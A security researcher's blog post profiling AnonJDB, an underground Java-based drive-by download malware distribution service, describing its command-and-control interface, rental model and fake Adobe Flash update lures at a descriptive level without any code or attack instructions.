Inside AnonJDB - a Java based malware distribution platforms for drive-by downloads
by Dancho Danchev With the even decreasing prices of underground tools and services, thanks to the commoditization of these very
by Dancho Danchev
With the even decreasing prices of underground tools and services, thanks to the commoditization of these very same market items, the price for renting a botnet, or purchasing access to already infected hosts, is constantly decreasing.
Although the majority of cybercriminals are actively exploiting end and corporate users while using client-side vulnerabilities in outdated third-party applications and browser plugins, there’s a separate branch of cybercriminals who specialize in delivering their payload using nothing else but good old fashioned social engineering attacks.
Following my previous post Inside a clickjacking/likejacking scam distribution platform for Facebook, in this post I will profile AnonJDB – a Java based malware distribution platform for drive-by downloads.
What exactly is AnonJDB?
Some of its features include:
A peek inside AnonJDB’s command and control interface:
Package prices for AnonJDB:
What’s particularly interesting about AnonJDB is its easy-to-manage command and control interface, and the fact that the cybercriminals are offering Dual Infection Via Adobe Flash Update, similar to the fake Adobe Flash Player screen profiled in my previous post Inside a clickjacking/likejacking scam distribution platform for Facebook.
In the past, malicious attackers used to rely on compromised FTP accounts for embedding of malicious iFrames within the compromised domains. Nowadays, the service is outsourced to a vendor offering managed hosting services for the entire platform, including the supply of fully undetected malicious Java applets and executable binaries.
You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.